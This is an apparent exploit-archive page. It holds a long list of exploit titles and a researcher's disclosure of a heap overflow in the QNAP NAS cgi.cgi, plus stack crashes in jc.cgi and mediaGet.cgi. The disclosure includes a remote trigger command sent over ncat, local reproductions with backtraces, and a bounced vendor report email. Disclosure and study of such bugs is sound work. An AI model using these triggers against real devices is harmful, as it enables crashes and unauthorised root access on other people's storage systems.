
3 new exploits QNAP NAS Devices - Heap Overflow Castle Rock Computing SNMPc 7.0.19 - Community String Stack Based Buffer Overflow Internet Download Accelerator 6.10.1.1527 - FTP Buffer Overflow (SEH) PHPFanBase 2.x - (protection.php) Remote File Inclusion PHPFanBase 2.x - 'protection.php' Remote File Inclusion DigiAffiliate 1.4 - (visu_user.asp id) SQL Injection DigiAffiliate 1.4 - 'id' Parameter SQL Injection ExoPHPDesk 1.2.1 - (faq.php) SQL Injection ExoPHPDesk 1.2.1 - 'faq.php' SQL Injection MiniGal b13 - (image backdoor) Remote Code Execution MiniGal b13 - Remote Code Execution PHP Auto Listings - 'moreinfo.php pg' SQL Injection Pre Simple CMS - SQL Injection (Authentication Bypass) PHP Auto Listings - 'pg' Parameter SQL Injection Pre Simple CMS - Authentication Bypass Harlandscripts drinks - (recid) SQL Injection Harlandscripts drinks - 'recid' Parameter SQL Injection Mole Group Taxi Calc Dist Script - (Authentication Bypass) SQL Injection Mole Group Taxi Calc Dist Script - Authentication Bypass DevelopItEasy Membership System 1.3 - (Authentication Bypass) SQL Injection DevelopItEasy Membership System 1.3 - Authentication Bypass NICE FAQ Script - (Authentication Bypass) SQL Injection NICE FAQ Script - Authentication Bypass SoftComplex PHP Image Gallery 1.0 - (Authentication Bypass) SQL Injection SoftComplex PHP Image Gallery 1.0 - Authentication Bypass DELTAScripts PHP Classifieds 7.5 - (Authentication Bypass) SQL Injection DELTAScripts PHP Links 1.3 - (Authentication Bypass) SQL Injection DELTAScripts PHP Shop 1.0 - (Authentication Bypass) SQL Injection SoftComplex PHP Image Gallery - (ctg) SQL Injection DELTAScripts PHP Classifieds 7.5 - Authentication Bypass DELTAScripts PHP Links 1.3 - Authentication Bypass DELTAScripts PHP Shop 1.0 - Authentication Bypass SoftComplex PHP Image Gallery - 'ctg' Parameter SQL Injection TurnkeyForms Business Survey Pro 1.0 - 'id' SQL Injection Mole Group Pizza - (manufacturers_id) Script SQL Injection TurnkeyForms Business Survey Pro 1.0 - 'id' Parameter SQL Injection Mole Group Pizza - 'manufacturers_id' Parameter SQL Injection E-topbiz Online Store 1 - (Authentication Bypass) SQL Injection PHP Auto Listings Script - (Authentication Bypass) SQL Injection Mole Group Rental Script - (Authentication Bypass) SQL Injection MyioSoft Ajax Portal 3.0 - (Authentication Bypass) SQL Injection MyioSoft EasyBookMarker - (Authentication Bypass) SQL Injection MyioSoft EasyCalendar - (Authentication Bypass) SQL Injection E-topbiz Online Store 1 - Authentication Bypass PHP Auto Listings Script - Authentication Bypass Mole Group Rental Script - Authentication Bypass MyioSoft Ajax Portal 3.0 - Authentication Bypass MyioSoft EasyBookMarker 4.0 - Authentication Bypass MyioSoft EasyCalendar - Authentication Bypass E-topbiz Online Store 1 - 'cat_id' SQL Injection E-topbiz Online Store 1 - 'cat_id' Parameter SQL Injection Myiosoft EasyBookMarker 4 - (Parent) SQL Injection Myiosoft EasyBookMarker 4 - 'Parent' Parameter SQL Injection Enthusiast 3.1.4 - (show_joined.php path) Remote File Inclusion V3 Chat Profiles/Dating Script 3.0.2 - (Authentication Bypass) SQL Injection Enthusiast 3.1.4 - 'show_joined.php' Remote File Inclusion V3 Chat Profiles/Dating Script 3.0.2 - Authentication Bypass DigiAffiliate 1.4 - (Authentication Bypass) SQL Injection Mole Group Airline Ticket Script - (Authentication Bypass) SQL Injection DigiAffiliate 1.4 - Authentication Bypass Mole Group Airline Ticket Script - Authentication Bypass ExoPHPDesk 1.2 Final - (Authentication Bypass) SQL Injection ZEEMATRI 3.0 - (bannerclick.php adid) SQL Injection ExoPHPDesk 1.2 Final - Authentication Bypass ZEEMATRI 3.0 - 'adid' Parameter SQL Injection Joomla! Component com_books - (book_id) SQL Injection Joomla! Component com_books - 'book_id' Parameter SQL Injection Joomla! / Mambo Component 'com_catalogproduction' - 'id' SQL Injection Joomla! / Mambo Component com_catalogproduction - 'id' Parameter SQL Injection PozScripts Business Directory Script - 'cid' SQL Injection PozScripts Business Directory Script - 'cid' Parameter SQL Injection Alstrasoft Web Host Directory - (Authentication Bypass) SQL Injection Quick Poll Script - 'code.php id' SQL Injection Alstrasoft Web Host Directory - Authentication Bypass Quick Poll Script - 'id' Parameter SQL Injection Bankoi Webhost Panel 1.20 - (Authentication Bypass) SQL Injection Bankoi Webhost Panel 1.20 - Authentication Bypass Minigal b13 - 'index.php list' Remote File Disclosure yahoo answers - 'id' SQL Injection Minigal b13 - Remote File Disclosure yahoo answers - 'id' Parameter SQL Injection PHPstore Wholesale - 'track.php?id' SQL Injection PHPstore Wholesale - 'id' Parameter SQL Injection E-topbiz ADManager 4 - (group) Blind SQL Injection E-topbiz ADManager 4 - 'group' Parameter Blind SQL Injection PHPfan 3.3.4 - (init.php includepath) Remote File Inclusion Jadu Galaxies - 'categoryId' Blind SQL Injection PHPfan 3.3.4 - 'init.php' Remote File Inclusion Jadu Galaxies - 'categoryId' Parameter Blind SQL Injection MemHT Portal 4.0.1 - (avatar) Remote Code Execution MemHT Portal 4.0.1 - Remote Code Execution MemHT Portal 4.0.1 - (pvtmsg) Delete All Private Messages Exploit MemHT Portal 4.0.1 - Delete All Private Messages Exploit MyioSoft Ajax Portal 3.0 - (page) SQL Injection MyioSoft Ajax Portal 3.0 - 'page' Parameter SQL Injection X10media Mp3 Search Engine < 1.6.2 Admin Access X10media Mp3 Search Engine < 1.6.2 - Admin Access Arab Portal 2.2 - (Authentication Bypass) SQL Injection Arab Portal 2.2 - Authentication Bypass Arab Portal 2.x - (forum.php qc) SQL Injection Arab Portal 2.x - 'forum.php' SQL Injection Arab Portal 2.2 - (mod.php module) Local File Inclusion Arab Portal 2.2 - 'mod.php' Local File Inclusion Collabtive - SQL Injection Collabtive 0.65 - SQL Injection All Enthusiast ReviewPost PHP Pro 2.5 - showproduct.php SQL Injection All Enthusiast ReviewPost PHP Pro 2.5 - showcat.php SQL Injection All Enthusiast ReviewPost PHP Pro 2.5 - 'showproduct.php' SQL Injection All Enthusiast ReviewPost PHP Pro 2.5 - 'showcat.php' SQL Injection All Enthusiast PhotoPost PHP Pro 5.0 - adm-photo.php Arbitrary Image Manipulation All Enthusiast PhotoPost PHP Pro 5.0 - 'adm-photo.php' Arbitrary Image Manipulation Collabtive 1.0 - (manageuser.php task Parameter) SQL Injection Collabtive 1.0 - 'manageuser.php' SQL Injection Arab Portal 2.0 - Link.php SQL Injection Arab Portal 2.0 - 'Link.php' SQL Injection Arab Portal System 2.0 - online.php title Parameter Cross-Site Scripting Arab Portal System 2.0 - download.php title Parameter Cross-Site Scripting Arab Portal 2.0 - 'online.php' Cross-Site Scripting Arab Portal 2.0 - 'download.php' Cross-Site Scripting ExoPHPDesk 1.2 - Pipe.php Remote File Inclusion ExoPHPDesk 1.2 - 'Pipe.php' Remote File Inclusion Collabtive 1.1 - (managetimetracker.php id Parameter) SQL Injection Collabtive 1.1 - 'managetimetracker.php' SQL Injection Zeeways Shaadi Clone 2.0 - 'admin/home.php' Authentication Bypass Zeeways Shaadi Clone 2.0 - Authentication Bypass PHPMailer < 5.2.20 / SwiftMailer < 5.4.5-DEV / Zend Framework / zend-mail < 2.4.11 - (AIO) 'PwnScriptum' Remote Code Execution
333 lines
No EOL
7.6 KiB
Text
Executable file
333 lines
No EOL
7.6 KiB
Text
Executable file
==================
|
|
|
|
1) [Heap overflow]
|
|
|
|
==================
|
|
|
|
Path: /home/httpd/cgi-bin/cgi.cgi
|
|
|
|
u = valid user [guest|admin]
|
|
|
|
1.1)
|
|
|
|
/* Remote */
|
|
|
|
[Remote host]# echo -en "GET /cgi-bin/cgi.cgi?u=admin&p=`for((i=0;i<263;i++));do echo -en "A";done` HTTP/1.0\nHost: QNAP\n\n" | ncat --ssl 192.168.5.7 443
|
|
|
|
HTTP/1.1 200 OK
|
|
|
|
Date: Sat, 31 Dec 2016 00:01:11 GMT
|
|
|
|
*** glibc detected *** cgi.cgi: free(): invalid next size (normal): 0x0806cec8 ***
|
|
|
|
======= Backtrace: =========
|
|
|
|
======= Memory map: ========
|
|
|
|
08048000-08069000 r-xp 00000000 00: 0e 7559 /home/httpd/cgi-bin/authLogin.cgi
|
|
|
|
08069000-0806b000 rw-p 00020000 00: 0e 7559 /home/httpd/cgi-bin/authLogin.cgi
|
|
|
|
0806b000-0808c000 rw-p 00000000 00: 00 0 [heap]
|
|
|
|
[====SNIP====]
|
|
|
|
ffe53000-ffe54000 rw-p 00000000 00: 00 0
|
|
|
|
Content-Length: 0
|
|
|
|
Connection: close
|
|
|
|
Content-Type: text/plain
|
|
|
|
[Remote host]#
|
|
|
|
=======
|
|
|
|
1.2)
|
|
|
|
/* Local test, to get more info from backtrace */
|
|
|
|
# export QUERY_STRING="u=admin&p=`for((i=0;i<263;i++));do echo -en "A";done`"
|
|
|
|
# ./cgi.cgi
|
|
|
|
*** glibc detected *** ./cgi.cgi: free(): invalid next size (normal): 0x0806cec8 ***
|
|
|
|
======= Backtrace: =========
|
|
|
|
/lib/libc.so.6[0xf6c3da62]
|
|
|
|
/lib/libc.so.6(cfree+0x89)[0xf6c3f729]
|
|
|
|
/lib/libc.so.6(fclose+0x136)[0xf6c2e5c6]
|
|
|
|
/lib/libnss_compat.so.2[0xf6b8ac25]
|
|
|
|
/lib/libnss_compat.so.2(_nss_compat_getspnam_r+0xb2)[0xf6b8b282]
|
|
|
|
/lib/libc.so.6(getspnam_r+0x77)[0xf6c9ef57]
|
|
|
|
/lib/libc.so.6(getspnam+0x78)[0xf6c9e3f8]
|
|
|
|
/usr/lib/libuLinux_NAS.so.0(Check_Local_User_Password+0x16c)[0xf7518972]
|
|
|
|
/usr/lib/libuLinux_NAS.so.0(Check_System_User_Password+0x56)[0xf7518f66]
|
|
|
|
/usr/lib/libuLinux_NAS.so.0(Check_NAS_Administrator_Password+0x24)[0xf75
|
|
19098]
|
|
|
|
./cgi.cgi[0x80502ed]
|
|
|
|
./cgi.cgi[0x8051a7e]
|
|
|
|
/lib/libc.so.6(__libc_start_main+0xe0)[0xf6bedf90]
|
|
|
|
./cgi.cgi[0x804d151]
|
|
|
|
======= Memory map: ========
|
|
|
|
08048000-08069000 r-xp 00000000 00:0e 7559 /home/httpd/cgi-bin/authLogin.cgi
|
|
|
|
08069000-0806b000 rw-p 00020000 00:0e 7559 /home/httpd/cgi-bin/authLogin.cgi
|
|
|
|
0806b000-0808c000 rw-p 00000000 00:00 0 [heap]
|
|
|
|
[====SNIP====]
|
|
|
|
ffd9e000-ffdbe000 rwxp 00000000 00:00 0 [stack]
|
|
|
|
ffdbe000-ffdbf000 rw-p 00000000 00:00 0
|
|
|
|
Aborted
|
|
|
|
#
|
|
|
|
1.3)
|
|
|
|
# export QUERY_STRING="u=admin&p=`for((i=0;i<5957;i++));do echo -en "A";done`"
|
|
|
|
# ./cgi.cgi
|
|
|
|
*** glibc detected *** : free(): invalid next size (normal): 0x0806e508 ***
|
|
|
|
======= Backtrace: =========
|
|
|
|
/lib/libc.so.6[0xf6c9da62]
|
|
|
|
/lib/libc.so.6(cfree+0x89)[0xf6c9f729]
|
|
|
|
/lib/libc.so.6(fclose+0x136)[0xf6c8e5c6]
|
|
|
|
/lib/libnss_compat.so.2[0xf6beac25]
|
|
|
|
/lib/libnss_compat.so.2(_nss_compat_getspnam_r+0xb2)[0xf6beb282]
|
|
|
|
/lib/libc.so.6(getspnam_r+0x77)[0xf6cfef57]
|
|
|
|
/lib/libc.so.6(getspnam+0x78)[0xf6cfe3f8]
|
|
|
|
/usr/lib/libuLinux_NAS.so.0(Check_Local_User_Password+0x16c)[0xf7578972]
|
|
|
|
/usr/lib/libuLinux_NAS.so.0(Check_System_User_Password+0x56)[0xf7578f66]
|
|
|
|
/usr/lib/libuLinux_NAS.so.0(Check_NAS_Administrator_Password+0x24)[0xf75
|
|
79098]
|
|
|
|
[0x80502ed]
|
|
|
|
[0x0]
|
|
|
|
======= Memory map: ========
|
|
|
|
08048000-08069000 r-xp 00000000 00:0e 6705 /home/httpd/cgi-bin/authLogin.cgi
|
|
|
|
08069000-0806b000 rw-p 00020000 00:0e 6705 /home/httpd/cgi-bin/authLogin.cgi
|
|
|
|
0806b000-0808c000 rw-p 00000000 00:00 0 [heap]
|
|
|
|
[====SNIP====]
|
|
|
|
# ./cgi.cgi
|
|
|
|
Segmentation fault
|
|
|
|
#
|
|
|
|
# dmesg
|
|
|
|
[====SNIP====]
|
|
|
|
[ 2185.562493] cgi.cgi[17772]: segfault at ff9a4010 ip 00000000f6bd75c3 sp 00000000ff99f1bc error 4 in libc-2.6.1.so[f6b6b000+12d000]
|
|
|
|
[====SNIP====]
|
|
|
|
/* Local as shown below, but can of course be called from remote */
|
|
|
|
==================
|
|
|
|
2) [STACK junk]
|
|
|
|
==================
|
|
|
|
# export QUERY_STRING="bug"
|
|
|
|
# ./jc.cgi
|
|
|
|
Segmentation fault
|
|
|
|
# dmesg
|
|
|
|
[====SNIP====]
|
|
|
|
[76277.192562] jc.cgi[18159]: segfault at 0 ip 00000000f6cbdffc sp 00000000ffeddbbc error 4 in libc-2.6.1.so[f6c52000+12d000]
|
|
|
|
[====SNIP====]
|
|
|
|
==================
|
|
|
|
3) [STACK junk]
|
|
|
|
==================
|
|
|
|
/* Local as shown, but can be called from remote */
|
|
|
|
# export QUERY_STRING="bug"
|
|
|
|
# ./mediaGet.cgi
|
|
|
|
Segmentation fault
|
|
|
|
# dmesg
|
|
|
|
[====SNIP====]
|
|
|
|
[76802.837766] mediaGet.cgi[6589]: segfault at 0 ip 00000000f6bd8ffc sp 00000000ffc0498c error 4 in libc-2.6.1.so[f6b6d000+12d000]
|
|
|
|
[====SNIP====]
|
|
|
|
Have a nice day (and happy new year)
|
|
|
|
/bashis
|
|
|
|
========================
|
|
|
|
Hello mcw (at) noemail (dot) eu [email concealed],
|
|
|
|
We're writing to let you know that the group you tried to contact (security) may not exist, or you may not have permission to post messages to the group. A few more details on why you weren't able to post:
|
|
|
|
* You might have spelled or formatted the group name incorrectly.
|
|
|
|
* The owner of the group may have removed this group.
|
|
|
|
* You may need to join the group before receiving permission to post.
|
|
|
|
* This group may not be open to posting.
|
|
|
|
If you have questions related to this or any other Google Group, visit the Help Center at https://support.google.com/a/qnap.com/bin/topic.py?topic=25838.
|
|
|
|
Thanks,
|
|
|
|
qnap.com admins
|
|
|
|
----- Original message -----
|
|
|
|
X-Received: by 10.99.242.5 with SMTP id v5mr94097752pgh.181.1483213806030;
|
|
|
|
Sat, 31 Dec 2016 11:50:06 -0800 (PST)
|
|
|
|
Return-Path: <mcw (at) noemail (dot) eu [email concealed]>
|
|
|
|
Received: from qnappm.info (mail2.qnappm.info. [113.196.50.102])
|
|
|
|
by mx.google.com with ESMTP id c74si60891262pfk.272.2016.12.31.11.50.05
|
|
|
|
for <security (at) qnap (dot) com [email concealed]>;
|
|
|
|
Sat, 31 Dec 2016 11:50:06 -0800 (PST)
|
|
|
|
Received-SPF: fail (google.com: domain of mcw (at) noemail (dot) eu [email concealed] does not designate 113.196.50.102 as permitted sender) client-ip=113.196.50.102;
|
|
|
|
Authentication-Results: mx.google.com;
|
|
|
|
spf=fail (google.com: domain of mcw (at) noemail (dot) eu [email concealed] does not designate 113.196.50.102 as permitted sender) smtp.mailfrom=mcw (at) noemail (dot) eu [email concealed]
|
|
|
|
X-AuthUser: qnap1688 (at) qnappm (dot) info [email concealed]
|
|
|
|
Received: from aid.qnap.com ([113.196.50.99]:36962)
|
|
|
|
by mail2.qnappm.info with [XMail 1.27 ESMTP Server]
|
|
|
|
id <S7F885> for <security (at) qnap (dot) com [email concealed]> from <mcw (at) noemail (dot) eu [email concealed]>;
|
|
|
|
Sun, 1 Jan 2017 04:13:48 +0800
|
|
|
|
Date: Sun, 1 Jan 2017 03:50:06 +0800
|
|
|
|
Return-Path: mcw (at) noemail (dot) eu [email concealed]
|
|
|
|
To: security (at) qnap (dot) com [email concealed]
|
|
|
|
From: bashis mcw <mcw (at) noemail (dot) eu [email concealed]>
|
|
|
|
Subject: Reporting Security Issues - [Critical] QNAP NAS devices suffer of Heap Overflow!
|
|
|
|
Message-ID: <5acc9d206d9601dc574a02b114c83e8a (at) aid.qnap (dot) com [email concealed]>
|
|
|
|
X-Priority: 3
|
|
|
|
X-Mailer: PHPMailer 5.1 (phpmailer.sourceforge.net)
|
|
|
|
MIME-Version: 1.0
|
|
|
|
Content-Type: multipart/alternative;
|
|
|
|
boundary="b1_5acc9d206d9601dc574a02b114c83e8a"
|
|
|
|
Category : Administration
|
|
|
|
Subject : QNAP NAS devices suffer of Heap Overflow!
|
|
|
|
Severity Level : Critical
|
|
|
|
Description :
|
|
|
|
Greetings gents,
|
|
|
|
QNAP NAS devices suffer from a critical Heap Overflow in "cgi.cgi" and
|
|
|
|
non critical stack crash in "jc.cgi and mediaGet.cgi".
|
|
|
|
Successful exploitation of this heap overflow vulnerability can lead to
|
|
|
|
unauthorised root (admin) privileges on QNAP devices with anonymous
|
|
|
|
access. (no credential needed to exploit)
|
|
|
|
Please note: 1st February 2017 i will release details of these bugs to
|
|
|
|
Full Disclosure and Bugtraq e-mail lists.
|
|
|
|
Please see below and attached.
|
|
|
|
Have a nice day (and happy new year)
|
|
|
|
/bashis
|
|
|
|
==================
|
|
|
|
1) [HEAP overflow]
|
|
|
|
==================
|
|
|
|
Path: /home/httpd/cgi-bin/cgi.cgi
|
|
|
|
u = valid user [guest|admin]
|
|
|
|
1.1)
|
|
|
|
/* Remote */
|
|
|
|
[Remote host]# echo -en "GET /cgi-bin/cgi.cgi?u=admin&p=`for((i=0;i
|
|
|
|
Sign Time : 2017/01/01 03:50:06 |